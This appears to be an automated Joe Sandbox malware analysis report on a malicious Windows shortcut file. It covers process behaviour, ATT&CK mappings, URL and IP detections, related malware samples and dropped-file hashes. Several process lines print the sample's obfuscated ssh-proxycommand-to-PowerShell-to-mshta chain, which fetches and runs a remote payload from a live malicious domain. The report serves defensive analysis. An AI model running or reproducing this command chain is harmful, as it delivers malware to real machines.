Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenSSH\ssh.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1647
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1496
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1726
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 726
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5500 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 | Thread sleep count: 1647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 | Thread sleep count: 1496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308 | Thread sleep count: 1726 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1588 | Thread sleep count: 726 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2688 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: svchost.exe, 00000007.00000002.3604441727.000002350E62B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3607034044.0000023513C59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
Source: ssh.exe, 00000001.00000002.3602296428.000001BAFA23A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99[ZP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\mshta.exe | Memory allocated: page read and write | page guard
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4Jump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command '[ljqom0_ffu}{mshta https://klipzynigou.shop/an4me.mp4[ljqom0_ffu}{'.substring(13, 40)" .
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix, listed per tactic (a leading number is the count the report attaches to that technique; techniques without a number carry no count):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 11 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1582823, Sample: HngJMpDqxP.lnk, Start date: 31/12/2024, Architecture: WINDOWS, Score: 76). The rendered graph is not part of the text; its recoverable nodes and edges are:

  • Start: contacts klipzynigou.shop; signatures: Antivirus detection for URL or domain; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 3 other signatures; starts ssh.exe and svchost.exe
  • ssh.exe: signature: Windows shortcut file (LNK) starts blacklisted processes; starts powershell.exe and conhost.exe
  • svchost.exe: contacts 127.0.0.1 (unknown, unknown); dropped file: C:\ProgramData\Microsoft\Network\...\qmgr.jfm (COM)
  • powershell.exe: signature: Windows shortcut file (LNK) starts blacklisted processes; starts powershell.exe
  • powershell.exe (child): signature: Windows shortcut file (LNK) starts blacklisted processes; starts mshta.exe
  • mshta.exe: contacts klipzynigou.shop 188.114.97.3, 443, 49718, 49719 (CLOUDFLARENETUS, European Union)

Source | Detection | Scanner | Label
HngJMpDqxP.lnk | 32% | Virustotal | -
HngJMpDqxP.lnk | 32% | ReversingLabs | Shortcut.Trojan.Pantera
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637l | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/styles/cf.errors.css | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4I | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4H | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637. | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/phish-bypasss | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637 | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4-2 | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4mJ | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4https://klipzynigou.shop/An4me.mp4 | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/phish-bypass:g | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/styles/cf.errors.cssU | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637: | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/phish-bypasse | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637N | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4;J | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4tJ | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/phish-bypass | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/1 | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/ | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4C: | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4) | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4ystem32 | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637P3 | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4Hi | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4 | 100% | Avira URL Cloud | malware
https://klipzynigou.shop/An4me.mp4a | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4yles/cf.errors.css | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4v | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4z | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637R | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4y | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4$global:? | 0% | Avira URL Cloud | safe
https://klipzynigou.shop/An4me.mp4p | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
klipzynigou.shop | 188.114.97.3 | true | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
https://klipzynigou.shop/cdn-cgi/styles/cf.errors.css | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637 | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4 | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637. | mshta.exe, 00000005.00000002.3604352911.000001AA7CF56000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/phish-bypasss | mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/ | mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/An4me.mp4I | mshta.exe, 00000005.00000002.3604352911.000001AA7CEDE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637l | mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4H | mshta.exe, 00000005.00000002.3604926028.000001AA7D0D0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4mJ | mshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/tD | mshta.exe, 00000005.00000002.3608242705.000001B27FBDA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/An4me.mp4-2 | mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4https://klipzynigou.shop/An4me.mp4 | mshta.exe, 00000005.00000002.3610369186.000001B27FD55000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000007.00000003.2422301015.0000023513A40000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr | false | - | high
http://crl.ver) | svchost.exe, 00000007.00000002.3606850826.0000023513C00000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/cdn-cgi/phish-bypass:g | mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6 | powershell.exe, 00000004.00000002.2394149079.000001768A0D9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637: | mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/phish-bypasse | mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4;J | mshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/1 | mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/styles/cf.errors.cssU | mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/5xx-error-landing | mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637N | mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/phish-bypass | mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4tJ | mshta.exe, 00000005.00000002.3604352911.000001AA7CEC5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/ | mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4C: | mshta.exe, 00000005.00000002.3604352911.000001AA7CEA0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/5xx-error-landingy | mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://g.live.com/odclientsettings/Prod1C: | edb.log.7.dr | false | - | high
https://www.cloudflare.com/5xx-error-landing: | mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/An4me.mp4) | mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4ystem32 | mshta.exe, 00000005.00000002.3604956103.000001AA7D0E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/a | mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/An4me.mp4Hi | mshta.exe, 00000005.00000002.3606198465.000001B27EDC0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4a | mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637R | mshta.exe, 00000005.00000002.3608242705.000001B27FB94000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/cdn-cgi/images/icon-exclamation.png?1376755637P3 | mshta.exe, 00000005.00000002.3604352911.000001AA7CEDE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4v | powershell.exe, 00000004.00000002.2394044056.0000017689BB0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4yles/cf.errors.css | mshta.exe, 00000005.00000002.3608242705.000001B27FB4C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4y | mshta.exe, 00000005.00000002.3604352911.000001AA7CEF5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2394149079.000001768A103000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/An4me.mp4z | mshta.exe, 00000005.00000002.3604352911.000001AA7CF17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2394149079.000001768A0B5000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.v | mshta.exe, 00000005.00000002.3604352911.000001AA7CF67000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/ | mshta.exe, 00000005.00000002.3604352911.000001AA7CF56000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://klipzynigou.shop/An4me.mp4$global:? | powershell.exe | false | Avira URL Cloud: safe | unknown
https://klipzynigou.shop/An4me.mp4p | powershell.exe, 00000004.00000002.2394149079.000001768A091000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | klipzynigou.shop | European Union | 13335 | CLOUDFLARENETUS | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582823
Start date and time: 2024-12-31 15:40:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HngJMpDqxP.lnk (renamed because original name is a hash value)
Original Sample Name: c90cd850078a3688894afc507e6b9ce8.lnk
Detection: MAL
Classification: mal76.winLNK@9/11@1/2
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 5
  • Number of non-executed functions: 2
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target mshta.exe, PID 6096 because it is empty
  • Execution Graph export aborted for target powershell.exe, PID 6788 because it is empty
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:41:48 | API Interceptor | 1x Sleep call for process: mshta.exe modified
09:41:49 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match: 188.114.97.3
Associated Sample Name / URL | Detection | Threat Name | Context
RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
gusetup.exe | malicious | Unknown | www.glarysoft.com/update/glary-utilities/pro/pro50/
Online Interview Scheduling Form.lnk | malicious | Ducktail | gmtagency.online/api/check

No context

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://br.custmercompa.de/ | malicious | Unknown | 172.67.139.222
tyPafmiT0t.exe | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | 188.114.96.3
vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 104.21.85.189
Invoice-BL. Payment TT $ 28,945.99.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114
Statement of Account - USD 16,720.00.exe | malicious | AgentTesla | 104.26.12.205
MJhe4xWsnR.msi | malicious | Unknown | 162.159.61.3
MJhe4xWsnR.msi | malicious | Unknown | 172.64.41.3
5EfYBe3nch.exe | malicious | LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc | 104.21.96.1
zhMQ0hNEmb.exe | malicious | LummaC | 104.21.112.1
2RxMkSAgZ8.exe | malicious | LummaC | 104.21.64.1

Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
setup.msi | malicious | Unknown | 188.114.97.3
GYede3Gwn0.lnk | malicious | Unknown | 188.114.97.3
6684V5n83w.exe | malicious | Vidar | 188.114.97.3
heteronymous.vbs | malicious | Remcos, GuLoader | 188.114.97.3
zku4YyCG6L.exe | malicious | Unknown | 188.114.97.3
hca5qDUYZH.exe | malicious | Unknown | 188.114.97.3
Loader.exe | malicious | Meduza Stealer | 188.114.97.3
setup.msi | malicious | Unknown | 188.114.97.3
BHgwhz3lGN.exe | malicious | Vidar | 188.114.97.3
Open Purchase Order Summary Details-16-12-2024.vbs | malicious | LodaRAT, XRed | 188.114.97.3

No context
                                Process:C:\Windows\System32\svchost.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.7263431135564928
                                Encrypted:false
                                SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0/:9JZj5MiKNnNhoxum
                                MD5:05F3EBB01FB174B41FBCF042EBAE0CEC
                                SHA1:B21B09D4F560156ACBF2B294D0B4C3F2A7A646FE
                                SHA-256:DB6339B142F2282A48F061E92E7F88ABE51F6D947D3E92106BAF5254FC94D3F5
                                SHA-512:0609B1AF497F7FD3ABF296DE06577C22E6459C47EDDA37FF41A2061630E43538317F8995583ACE2B486C39F5766FBE594AF871353F79980DE66983861C715CE8
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\System32\svchost.exe
                                File Type:Extensible storage user DataBase, version 0x620, checksum 0x509de5be, page size 16384, DirtyShutdown, Windows version 10.0
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.7556115197066192
                                Encrypted:false
                                SSDEEP:1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL
                                MD5:1CBEFDE111F4A0B5F7F97AA7BADAE43C
